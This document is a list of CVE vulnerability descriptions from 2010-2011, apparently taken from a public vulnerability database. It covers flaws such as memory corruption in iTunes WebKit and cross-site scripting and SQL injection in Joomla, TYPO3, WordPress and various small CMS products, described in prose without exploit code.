[CVE-2011-0131] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0130] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0129] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0128] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0127] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0126] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0125] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0124] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0123] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0122] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0121] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0120] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0119] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0118] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0117] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0116] Use-after-free vulnerability in the setOuterText method in the htmlelement library in WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to DOM manipulations during iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0115] The DOM level 2 implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, does not properly handle DOM manipulations associated with event listeners during processing of range objects, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0114] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0113] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0112] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0111] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1.
[CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability."
[CVE-2011-0059] Cross-site request forgery (CSRF) vulnerability in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, allows remote attackers to hijack the authentication of arbitrary users for requests that were initiated by a plugin and received a 307 redirect to a page on a different web site.
[CVE-2011-0057] Use-after-free vulnerability in the Web Workers implementation in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, allows remote attackers to execute arbitrary code via vectors related to a JavaScript Worker and garbage collection.
[CVE-2011-0047] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.2 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) comments, aka "CSS injection vulnerability."
[CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability."
[CVE-2011-0005] Cross-site scripting (XSS) vulnerability in the com_search module for Joomla! 1.0.x through 1.0.15 allows remote attackers to inject arbitrary web script or HTML via the ordering parameter to index.php.
[CVE-2011-0004] Multiple cross-site scripting (XSS) vulnerabilities in Piwik before 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-5287] SQL injection vulnerability in default.php in Cornerstone Technologies webConductor allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2010-5284] Multiple cross-site scripting (XSS) vulnerabilities in Collabtive 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) User parameter in the edit user profile feature to manageuser.php, (2) y parameter in a newcal action to manageajax.php, and the (3) pic parameter to thumb.php.
[CVE-2010-5282] Multiple cross-site scripting (XSS) vulnerabilities in OpenText ECM (formerly Livelink ECM) 9.7.1 allow remote attackers to inject arbitrary web script or HTML via the (1) viewType and (2) sort parameters in a browse action to livelink/livelink
[CVE-2010-5275] Cross-site scripting (XSS) vulnerability in memcache_admin in the Memcache module 5.x before 5.x-1.10 and 6.x before 6.x-1.6 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-5247] Untrusted search path vulnerability in QtWeb Browser 3.3 build 043 allows local users to gain privileges via a Trojan horse wintab32.dll file in the current working directory, as demonstrated by a directory that contains a .html, .htm, or .mhtml file. NOTE: some of these details are obtained from third party information.
[CVE-2010-5192] Cross-site scripting (XSS) vulnerability in the Java Management Console in Blue Coat ProxySG before SGOS 4.3.4.1, 5.x before SGOS 5.4.5.1, 5.5 before SGOS 5.5.4.1, and 6.x before SGOS 6.1.1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-5183] ** DISPUTED ** Race condition in Webroot Internet Security Essentials 6.1.0.145 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute.
[CVE-2010-5159] ** DISPUTED ** Race condition in Dr.Web Security Space Pro 6.0.0.03100 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute.
[CVE-2010-5149] Websense Web Security and Web Filter before 6.3.3 Hotfix 27 and 7.x before 7.1.1 allow remote attackers to cause a denial of service (Blue Coat appliance integration outage) via a long URL.
[CVE-2010-5148] Websense Web Security and Web Filter before 7.1 Hotfix 21 do not set the secure flag for the Encrypted Session (SSL) cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session.
[CVE-2010-5147] The Remote Filtering component in Websense Web Security and Web Filter before 6.3.3 Hotfix 18 and 7.x before 7.1.1 allows remote attackers to cause a denial of service (daemon exit) via a large volume of traffic.
[CVE-2010-5146] The Remote Filtering component in Websense Web Security and Web Filter before 7.1 Hotfix 66 allows local users to bypass filtering by (1) renaming the WDC.exe file or (2) deleting driver files.
[CVE-2010-5145] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 136 and 7.x before 7.1.1 on Windows allows remote attackers to cause a denial of service (filtering outage) via a crafted sequence of characters in a URI.
[CVE-2010-5144] The ISAPI Filter plug-in in Websense Enterprise, Websense Web Security, and Websense Web Filter 6.3.3 and earlier, when used in conjunction with a Microsoft ISA or Microsoft Forefront TMG server, allows remote attackers to bypass intended filtering and monitoring activities for web traffic via an HTTP Via header.
[CVE-2010-5106] The XML-RPC remote publishing interface in xmlrpc.php in WordPress before 3.0.3 does not properly check capabilities, which allows remote authenticated users to bypass intended access restrictions, and publish, edit, or delete posts, by leveraging the Author or Contributor role.
[CVE-2010-5100] Multiple cross-site scripting (XSS) vulnerabilities in the Install Tool in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-5098] Cross-site scripting (XSS) vulnerability in the FORM content object in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-5097] Cross-site scripting (XSS) vulnerability in the click enlarge functionality in TYPO3 4.3.x before 4.3.9 and 4.4.x before 4.4.5 when the caching framework is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-5095] Cross-site scripting (XSS) vulnerability in SilverStripe 2.3.x before 2.3.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to DataObjectSet pagination.
[CVE-2010-5083] SQL injection vulnerability in the Web_Links module for PHP-Nuke 8.0 allows remote attackers to execute arbitrary SQL commands via the url parameter in an Add action to modules.php.
[CVE-2010-5078] SilverStripe 2.3.x before 2.3.10 and 2.4.x before 2.4.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain version information via a direct request to (1) sapphire/silverstripe_version or (2) cms/silverstripe_version.
[CVE-2010-5074] The layout engine in Mozilla Firefox before 4.0, Thunderbird before 3.3, and SeaMonkey before 2.1 executes different code for visited and unvisited links during the processing of Cascading Style Sheets (CSS) token sequences, which makes it easier for remote attackers to obtain sensitive information about visited web pages via a timing attack.
[CVE-2010-5073] The JavaScript implementation in Google Chrome 4 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. NOTE: this may overlap CVE-2010-5070.
[CVE-2010-5072] The JavaScript implementation in Opera 10.5 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.
[CVE-2010-5071] The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.
[CVE-2010-5070] The JavaScript implementation in Apple Safari 4 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method, a different vulnerability than CVE-2010-2264. NOTE: this may overlap CVE-2010-5073.
[CVE-2010-5069] The Cascading Style Sheets (CSS) implementation in Google Chrome 4 does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document. NOTE: this may overlap CVE-2010-2264.
[CVE-2010-5068] The Cascading Style Sheets (CSS) implementation in Opera 10.5 does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264.
[CVE-2010-5064] Multiple cross-site scripting (XSS) vulnerabilities in Virtual War (aka VWar) 1.6.1 R2 allow remote attackers to inject arbitrary web script or HTML via (1) the Additional Information field to challenge.php, the (2) Additional Information or (3) Contact information field to joinus.php, (4) the War Report field to admin/admin.php in a finishwar action, or (5) the Nick field to profile.php.
[CVE-2010-5054] Cross-site scripting (XSS) vulnerability in Special:Login in JAMWiki before 0.8.4 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2010-5052] Cross-site scripting (XSS) vulnerability in admin/components.php in GetSimple CMS 2.01 allows remote attackers to inject arbitrary web script or HTML via the val[] parameter.
[CVE-2010-5051] Cross-site scripting (XSS) vulnerability in admin/core/admin_func.php in razorCMS 1.0 stable allows remote attackers to inject arbitrary web script or HTML via the content parameter in an edit action to admin/index.php.
[CVE-2010-5050] Cross-site scripting (XSS) vulnerability in jsp/admin/tools/remote_share.jsp in ManageEngine ADManager Plus 4.4.0 allows remote attackers to inject arbitrary web script or HTML via the computerName parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-5048] Cross-site scripting (XSS) vulnerability in admin.jcomments.php in the JoomlaTune JComments (com_jcomments) component 2.1.0.0 for Joomla! allows remote authenticated users to inject arbitrary web script or HTML via the name parameter to index.php.
[CVE-2010-5046] Cross-site scripting (XSS) vulnerability in admin.php in ecoCMS allows remote attackers to inject arbitrary web script or HTML via the p parameter.
[CVE-2010-5045] Cross-site scripting (XSS) vulnerability in poll/default.asp in Smart ASP Survey allows remote attackers to inject arbitrary web script or HTML via the catid parameter.
[CVE-2010-5042] Cross-site scripting (XSS) vulnerability in the DJ-ArtGallery (com_djartgallery) component 0.9.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the cid[] parameter in an editItem action to administrator/index.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-5035] Cross-site scripting (XSS) vulnerability in search.php in iScripts eSwap 2.0 allows remote attackers to inject arbitrary web script or HTML via the txtHomeSearch parameter (aka the search field). NOTE: some of these details are obtained from third party information.
[CVE-2010-5031] Cross-site scripting (XSS) vulnerability in index.php in fileNice 1.1 allows remote attackers to inject arbitrary web script or HTML via the sstring parameter (aka the Search Box). NOTE: some of these details are obtained from third party information.
[CVE-2010-5030] Cross-site scripting (XSS) vulnerability in index.php in Ecomat CMS 5.0 allows remote attackers to inject arbitrary web script or HTML via the lang parameter in a web action.
[CVE-2010-5029] SQL injection vulnerability in index.php in Ecomat CMS 5.0 allows remote attackers to execute arbitrary SQL commands via the show parameter in a web action.
[CVE-2010-5027] Cross-site scripting (XSS) vulnerability in winners.php in Science Fair In A Box (SFIAB) 2.0.6 and 2.2.0 allows remote attackers to inject arbitrary web script or HTML via the type parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-5025] Cross-site scripting (XSS) vulnerability in manage/main.php in CuteSITE CMS 1.2.3 and 1.5.0 allows remote attackers to inject arbitrary web script or HTML via the fld_path parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-5018] Cross-site scripting (XSS) vulnerability in products/classified/headersearch.php in 2daybiz Online Classified Script allows remote attackers to inject arbitrary web script or HTML via the sid parameter.
[CVE-2010-5010] Cross-site scripting (XSS) vulnerability in schoolmv2/html/studentmain.php in SchoolMation 2.3 allows remote attackers to inject arbitrary web script or HTML via the session parameter.
[CVE-2010-5007] Cross-site scripting (XSS) vulnerability in pages/match_report.php in UTStats Beta 4 and earlier allows remote attackers to inject arbitrary web script or HTML via the mid parameter.
[CVE-2010-5005] Cross-site scripting (XSS) vulnerability in members/profileCommentsResponse.php in Rayzz Photoz allows remote attackers to inject arbitrary web script or HTML via the profileCommentTextArea parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-5002] Cross-site scripting (XSS) vulnerability in modules/slideshowmodule/slideshow.js.php in Exponent CMS 0.97.0 allows remote attackers to inject arbitrary web script or HTML via the u parameter.
[CVE-2010-4985] Cross-site scripting (XSS) vulnerability in notes.php in My Kazaam Notes Management System allows remote attackers to inject arbitrary web script or HTML via vectors involving the "Enter Reference Number Below" text box.
[CVE-2010-4978] Cross-site scripting (XSS) vulnerability in image/view.php in CANDID allows remote attackers to inject arbitrary web script or HTML via the image_id parameter.
[CVE-2010-4976] Cross-site scripting (XSS) vulnerability in search/search.php in MetInfo 3.0 allows remote attackers to inject arbitrary web script or HTML via the searchword parameter (aka Search Box field). NOTE: some of these details are obtained from third party information.
[CVE-2010-4973] Cross-site scripting (XSS) vulnerability in the search feature in Campsite 3.4.0 allows remote attackers to inject arbitrary web script or HTML via the f_search_keywords parameter. NOTE: the provenance of this information is unknown.
[CVE-2010-4971] Cross-site scripting (XSS) vulnerability in VideoWhisper PHP 2 Way Video Chat component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the r parameter to index.php.
[CVE-2010-4970] SQL injection vulnerability in handlers/getpage.php in Wiki Web Help 0.28 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2010-4968] SQL injection vulnerability in the webmaster-tips.net Flash Gallery (com_wmtpic) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.
[CVE-2010-4966] Cross-site scripting (XSS) vulnerability in default.asp in ATCOM Netvolution allows remote attackers to inject arbitrary web script or HTML via the query parameter in a Search action.
[CVE-2010-4962] Unspecified vulnerability in the Webkit PDFs (webkitpdf) extension before 1.1.4 for TYPO3 allows remote attackers to execute arbitrary commands via unknown vectors.
[CVE-2010-4961] SQL injection vulnerability in the Webkit PDFs (webkitpdf) extension before 1.1.4 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2010-4960] Cross-site scripting (XSS) vulnerability in the Branchenbuch (aka Yellow Pages or mh_branchenbuch) extension before 0.9.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4956] Cross-site scripting (XSS) vulnerability in the Questionnaire (ke_questionnaire) extension before 2.2.3 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4951] Cross-site scripting (XSS) vulnerability in the xaJax Shoutbox (vx_xajax_shoutbox) extension before 1.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4949] Cross-site scripting (XSS) vulnerability in the (1) FreiChat component before 2.1.2 for Joomla! and the (2) FreiChatPure component before 1.2.2 for Joomla! allows remote attackers to inject arbitrary web script or HTML by entering it in an unspecified window.
[CVE-2010-4947] Cross-site scripting (XSS) vulnerability in advanced_search_result.php in ALLPC 2.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2010-4938] SQL injection vulnerability in the Weblinks (com_weblinks) component in Joomla! allows remote attackers to execute arbitrary SQL commands via the Itemid parameter in a categories action to index.php. NOTE: the provenance of this information is unknown.
[CVE-2010-4932] Cross-site scripting (XSS) vulnerability in search.php in Entrans before 0.3.3 allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2010-4930] Cross-site scripting (XSS) vulnerability in index.php in @mail Webmail before 6.2.0 allows remote attackers to inject arbitrary web script or HTML via the MailType parameter in a mail/auth/processlogin action.
[CVE-2010-4928] Cross-site scripting (XSS) vulnerability in the Restaurant Guide (com_restaurantguide) component 1.0.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML by placing it after a > (greater than) character.
[CVE-2010-4920] SQL injection vulnerability in detail.asp in Micronetsoft Rental Property Management Website 1.0 allows remote attackers to execute arbitrary SQL commands via the ad_ID parameter.
[CVE-2010-4919] SQL injection vulnerability in detail.asp in Micronetsoft RV Dealer Website 1.0 allows remote attackers to execute arbitrary SQL commands via the vehicletypeID parameter.
[CVE-2010-4913] Cross-site scripting (XSS) vulnerability in the search feature in ColdGen ColdUserGroup 1.06 allows remote attackers to inject arbitrary web script or HTML via the Keywords parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-4909] Multiple cross-site scripting (XSS) vulnerabilities in PaysiteReviewCMS 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to search.php or the (2) image parameter to image.php.
[CVE-2010-4907] Cross-site scripting (XSS) vulnerability in zp-core/admin.php in Zenphoto 1.3 allows remote attackers to inject arbitrary web script or HTML via the user parameter. NOTE: the from parameter is already covered by CVE-2009-4562.
[CVE-2010-4901] Multiple cross-site scripting (XSS) vulnerabilities in char_map.php in MySource Matrix 3.28.3 allow remote attackers to inject arbitrary web script or HTML via the (1) height or (2) width parameter.
[CVE-2010-4900] Open redirect vulnerability in c.php in CMS WebManager-Pro 8.1 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.
[CVE-2010-4899] SQL injection vulnerability in c.php in CMS WebManager-Pro before 8.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2010-4896] Cross-site scripting (XSS) vulnerability in admin/index.asp in Member Management System 4.0 allows remote attackers to inject arbitrary web script or HTML via the REF_URL parameter.
[CVE-2010-4895] Cross-site scripting (XSS) vulnerability in core/showsite.php in chillyCMS 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the username field). NOTE: some of these details are obtained from third party information.
[CVE-2010-4893] Cross-site scripting (XSS) vulnerability in foodvendors.php in FestOS 2.3b allows remote attackers to inject arbitrary web script or HTML via the category parameter in a details action.
[CVE-2010-4892] Cross-site scripting (XSS) vulnerability in the powermail extension before 1.5.5 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4890] Cross-site scripting (XSS) vulnerability in the Yet Another Calendar (ke_yac) extension before 1.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4886] Cross-site scripting (XSS) vulnerability in the "official twitter tweet button for your page" (tweetbutton) extension before 1.0.5 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4885] Cross-site scripting (XSS) vulnerability in the XING Button (xing) extension before 1.0.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-4883] Cross-site scripting (XSS) vulnerability in manager/index.php in MODx Revolution 2.0.2-pl allows remote attackers to inject arbitrary web script or HTML via the modhash parameter.
[CVE-2010-4882] Cross-site scripting (XSS) vulnerability in autocms.php in Auto CMS 1.6 allows remote attackers to inject arbitrary web script or HTML via the sitetitle parameter.
[CVE-2010-4880] Multiple cross-site scripting (XSS) vulnerabilities in calendar.class.php in ApPHP Calendar (ApPHP CAL) allow remote attackers to inject arbitrary web script or HTML via the (1) category_name, (2) category_description, (3) event_name, or (4) event_description parameter.
[CVE-2010-4877] Cross-site scripting (XSS) vulnerability in index.php in OneCMS 2.6.1 allows remote attackers to inject arbitrary web script or HTML via the view parameter.
[CVE-2010-4875] Cross-site scripting (XSS) vulnerability in vodpod-video-gallery/vodpod_gallery_thumbs.php in the Vodpod Video Gallery Plugin 3.1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the gid parameter.
[CVE-2010-4874] Multiple cross-site scripting (XSS) vulnerabilities in users.php in NinkoBB 1.3 RC5 allow remote attackers to inject arbitrary web script or HTML via the (1) first_name, (2) last_name, (3) msn, or (4) aim parameter.
[CVE-2010-4873] Cross-site scripting (XSS) vulnerability in confirm.php in WeBid 0.8.5 P1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2010-4868] Cross-site scripting (XSS) vulnerability in search.php3 (aka search.php) in W-Agora 4.2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the bn parameter.
[CVE-2010-4863] Cross-site scripting (XSS) vulnerability in admin/changedata.php in GetSimple CMS 2.01 allows remote attackers to inject arbitrary web script or HTML via the post-title parameter.
[CVE-2010-4861] SQL injection vulnerability in asearch.php in webSPELL 4.2.1 allows remote attackers to execute arbitrary SQL commands via the search parameter.
[CVE-2010-4859] SQL injection vulnerability in index.php in WebAsyst Shop-Script allows remote attackers to execute arbitrary SQL commands via the blog_id parameter in a news action.
[CVE-2010-4856] SQL injection vulnerability in arsiv.asp in xWeblog 2.2 allows remote attackers to execute arbitrary SQL commands via the tarih parameter.
[CVE-2010-4855] SQL injection vulnerability in oku.asp in xWeblog 2.2 allows remote attackers to execute arbitrary SQL commands via the makale_id parameter.
[CVE-2010-4852] Cross-site scripting (XSS) vulnerability in login.php in Eclime 1.1.2b allows remote attackers to inject arbitrary web script or HTML via the reason parameter in a fail action.
[CVE-2010-4850] Multiple cross-site scripting (XSS) vulnerabilities in Diferior 8.03 allow remote attackers to inject arbitrary web script or HTML via the (1) post_content parameter to post/edit/2/p1.html, related to views/post.php
[CVE-2010-4848] Multiple cross-site scripting (XSS) vulnerabilities in addlink.php in AXScripts AxsLinks 0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) url or (2) title parameter.
[CVE-2010-4843] SQL injection vulnerability in website-page.php in PHP Web Scripts Ad Manager Pro 3.0 allows remote attackers to execute arbitrary SQL commands via the pageId parameter.
[CVE-2010-4841] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine EventLog Analyzer 6.1 allow remote attackers to inject arbitrary web script or HTML via the (1) HOST_ID, (2) OS, (3) GROUP, (4) exportFile, (5) load, (6) type, or (7) tab parameter to INDEX.do, the (8) reported parameter to INDEX2.do, the (9) gId parameter to hostlist.do, the (10) newWindow parameter to globalSettings.do, or the (11) STATUS parameter to enableHost.do.
[CVE-2010-4837] Cross-site scripting (XSS) vulnerability in the JSupport (com_jsupport) component 1.5.6 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the subject parameter (title field) in a saveTicket action to index2.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-4836] Cross-site scripting (XSS) vulnerability in register.html in PHPShop 2.1 EE and earlier allows remote attackers to inject arbitrary web script or HTML via the name_new parameter.
[CVE-2010-4828] Multiple cross-site scripting (XSS) vulnerabilities in SolarWinds Orion Network Performance Monitor (NPM) 10.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Title parameter to MapView.aspx
[CVE-2010-4827] Cross-site scripting (XSS) vulnerability in members.asp in Snitz Forums 2000 3.4.07 allows remote attackers to inject arbitrary web script or HTML via the M_NAME parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-4825] Cross-site scripting (XSS) vulnerability in magpie_debug.php in the Twitter Feed plugin (wp-twitter-feed) 0.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2010-4823] Cross-site scripting (XSS) vulnerability in the httpError method in sapphire/core/control/RequestHandler.php in SilverStripe 2.3.x before 2.3.10 and 2.4.x before 2.4.4, when custom error handling is not used, allows remote attackers to inject arbitrary web script or HTML via "missing URL actions."
[CVE-2010-4821] Cross-site scripting (XSS) vulnerability in phpMyFAQ before 2.6.9 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.
[CVE-2010-4813] Cross-site scripting (XSS) vulnerability in the Category Tokens module 6.x before 6.x-1.1 for Drupal allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML by editing or creating vocabulary names, which are not properly handled in token help.
[CVE-2010-4811] Multiple cross-site scripting (XSS) vulnerabilities in ajaxmember.php in 6kbbs 8.0 build 20100901 allow remote attackers to inject arbitrary web script or HTML via the (1) user[msn], (2) user[email], and (3) user[phone] parameters in a modifyDetails action.
[CVE-2010-4810] Multiple PHP remote file inclusion vulnerabilities in AR Web Content Manager (AWCM) 2.1 final allow remote attackers to execute arbitrary PHP code via a URL in the theme_file parameter to (1) includes/window_top.php and (2) header.php, and the (3) lang_file parameter to control/common.php.
[CVE-2010-4808] SQL injection vulnerability in index.php in Webmatic allows remote attackers to execute arbitrary SQL commands via the p parameter.
[CVE-2010-4807] Race condition in IBM Web Content Manager (WCM) 7.0.0.1 before CF003 allows remote authenticated users to cause a denial of service (infinite recursive query) via unspecified vectors, related to a StackOverflowError exception.
[CVE-2010-4806] The authoring tool in IBM Web Content Manager (WCM) 6.1.5, and 7.0.0.1 before CF003, allows remote authenticated users to bypass intended access restrictions on draft creation by leveraging certain resource editor privileges.
